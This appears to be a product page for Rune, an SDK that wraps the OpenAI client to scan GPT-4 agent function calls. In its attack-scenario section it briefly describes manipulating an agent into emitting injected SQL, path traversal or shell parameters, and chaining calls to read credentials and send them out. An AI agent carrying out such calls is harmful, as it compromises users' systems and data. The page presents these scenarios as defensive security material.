Secure Every Function Call Your GPT-4 Agent Makes
GPT-4 function calling turns your agent into a tool-using system that executes real actions. Every function call the model generates is an opportunity for attack. Rune wraps your OpenAI client transparently — same API, same types — while scanning every message, function call, and response for threats.
from openai import OpenAI
from rune import Shield
from rune.integrations.openai import shield_client
shield = Shield(api_key="rune_live_xxx")
client = shield_client(OpenAI(), shield=shield, agent_id="my-agent")
# Use exactly like a normal OpenAI client
response = client.chat.completions.create(...)Real-World Attack Scenarios
Function Parameter Injection
A user crafts input that causes GPT-4 to generate a function call with malicious parameters — SQL injection in a database query, path traversal in a file operation, or a shell command in a system tool.
Without Rune: Your code executes the function with the attacker-controlled parameters, leading to data breach or unauthorized system access.
With Rune: Rune intercepts the function call before execution, detects the malicious parameters, and blocks the call. An alert fires with the full payload for review.
Multi-Function Chain Attack
An attacker triggers a sequence of function calls that are individually benign but together accomplish a malicious goal — read credentials from config, then send them to an external API.
Without Rune: Each function call passes validation individually. The attacker exfiltrates sensitive data through a chain of legitimate-looking operations.
With Rune: Rune tracks function call sequences across the session. The behavioral analysis layer detects the exfiltration pattern and blocks the outbound call.
How It Works
Install the SDK
pip install runesec[openai] — adds the transparent client wrapper for the OpenAI Python SDK.
Wrap your client
Wrap your OpenAI client with shield_client(). Same API, same types, same return values. One line of code to add security.
Monitor and enforce
Every function call is scanned before execution. View events in the dashboard, configure alerts, and define policies for function-level access control.
Frequently Asked Questions
Does the wrapper change the OpenAI client API?
No. shield_client() returns a drop-in replacement. Same methods, same types, same return values. Your existing code works unchanged.
Does it work with async OpenAI clients?
Yes. Full support for both synchronous and async clients, including streaming responses and function calling.
Can I restrict which functions the model can call?
Yes. Define YAML policies that specify allowed functions, parameter constraints, and rate limits. Rune enforces them on every function call.
Does Rune work with the Assistants API?
Yes. Rune scans tool calls made by Assistants, including code interpreter and file search interactions.
Secure your OpenAI agents today
Add runtime security in under 5 minutes. Free plan includes 10,000 events per month.